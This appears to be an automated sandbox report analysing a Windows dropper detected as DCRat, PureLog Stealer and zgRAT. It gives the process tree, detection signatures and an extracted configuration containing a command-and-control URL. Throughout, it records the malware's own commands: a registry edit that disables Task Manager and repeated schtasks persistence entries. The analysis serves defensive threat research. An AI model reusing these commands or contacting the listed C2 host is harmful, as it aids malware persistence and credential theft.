Windows Analysis Report
1znAXdPcM5.exe

Overview

General Information

Sample name: 1znAXdPcM5.exe (renamed because original name is a hash value)
Original sample name: e656db3deb4cf58570317e64607c5420.exe
Analysis ID: 1583022
MD5: e656db3deb4cf58570317e64607c5420
SHA1: 828c7c6b815e294ee7a5bbe26af14ed3307fd4be
SHA256: 71be504d45fbc0506cfd654d3d185f11774f4b2f0613ae2199a583438f989caf
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • 1znAXdPcM5.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\1znAXdPcM5.exe" MD5: E656DB3DEB4CF58570317E64607C5420)
    • wscript.exe (PID: 2136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3320 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5316 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Agentcomponentbrokermonitordhcp.exe (PID: 600 cmdline: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe" MD5: 86AF92730370230540800E6D509E4155)
          • schtasks.exe (PID: 1312 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5820 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4544 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 8 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4948 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7084 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 5 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5164 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5052 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 11 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1376 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7048 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2016 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7172 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7196 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7244 cmdline: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7268 cmdline: schtasks.exe /create /tn "Agentcomponentbrokermonitordhcp" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7392 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7432 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • aXnWbWpBWYJmkhPMHrrUNM.exe (PID: 7580 cmdline: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" MD5: 86AF92730370230540800E6D509E4155)
  • Agentcomponentbrokermonitordhcp.exe (PID: 7352 cmdline: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe MD5: 86AF92730370230540800E6D509E4155)
  • Agentcomponentbrokermonitordhcp.exe (PID: 7384 cmdline: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe MD5: 86AF92730370230540800E6D509E4155)
  • aXnWbWpBWYJmkhPMHrrUNM.exe (PID: 7420 cmdline: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe" MD5: 86AF92730370230540800E6D509E4155)
  • aXnWbWpBWYJmkhPMHrrUNM.exe (PID: 7448 cmdline: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe" MD5: 86AF92730370230540800E6D509E4155)
  • cleanup
{"C2 url": "http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate", "MUTEX": "DCR_MUTEX-4vN0EXGexU6B21K1d7FI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
1znAXdPcM5.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
1znAXdPcM5.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.1znAXdPcM5.exe.5714721.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.1znAXdPcM5.exe.5714721.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.1znAXdPcM5.exe.6dd8721.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" , CommandLine: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe, NewProcessName: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe, OriginalFileName: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" , ProcessId: 7580, ProcessName: aXnWbWpBWYJmkhPMHrrUNM.exe
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ProcessId: 600, TargetFilename: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\1znAXdPcM5.exe", ParentImage: C:\Users\user\Desktop\1znAXdPcM5.exe, ParentProcessId: 1516, ParentProcessName: 1znAXdPcM5.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , ProcessId: 2136, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f, CommandLine: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe", ParentImage: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ParentProcessId: 600, ParentProcessName: Agentcomponentbrokermonitordhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f, ProcessId: 1312, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f, CommandLine: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe", ParentImage: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ParentProcessId: 600, ParentProcessName: Agentcomponentbrokermonitordhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f, ProcessId: 7244, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\1znAXdPcM5.exe", ParentImage: C:\Users\user\Desktop\1znAXdPcM5.exe, ParentProcessId: 1516, ParentProcessName: 1znAXdPcM5.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , ProcessId: 2136, ProcessName: wscript.exe

                                    Persistence and Installation Behavior

                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe", ParentImage: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ParentProcessId: 600, ParentProcessName: Agentcomponentbrokermonitordhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, ProcessId: 7172, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T15:02:11.758998+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.38.84 | 80 | TCP

                                    AV Detection

Source: 1znAXdPcM5.exe | Avira: detected
Source: http://891781cm.renyash.ru/ | Avira URL Cloud: Label: malware
Source: http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php | Avira URL Cloud: Label: malware
Source: http://891781cm.renyash.ru | Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\QPyLHGSL.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\axSbriXt.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\XeElcNfe.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\ebskEcaT.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate", "MUTEX": "DCR_MUTEX-4vN0EXGexU6B21K1d7FI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | ReversingLabs: Detection: 71%
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | ReversingLabs: Detection: 71%
Source: C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe | ReversingLabs: Detection: 71%
Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\GoOOBNnj.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\HBUOKBdR.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\QPyLHGSL.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\XeElcNfe.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\axSbriXt.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\ebskEcaT.log | ReversingLabs: Detection: 50%
Source: 1znAXdPcM5.exe | Virustotal: Detection: 49%
Source: 1znAXdPcM5.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\axSbriXt.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XeElcNfe.log | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IlqWXNCe.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ToOuVQfl.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | Joe Sandbox ML: detected
Source: 1znAXdPcM5.exe | Joe Sandbox ML: detected
                                    Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-4vN0EXGexU6B21K1d7FI","0","VLADIK","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://891781cm.renyash.ru/","ProcessorServerdefaultsqltrafficuniversalwpprivate"]]
                                    Source: 1znAXdPcM5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 1znAXdPcM5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 1znAXdPcM5.exe
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0058A69B
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0059C220
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Local\discord
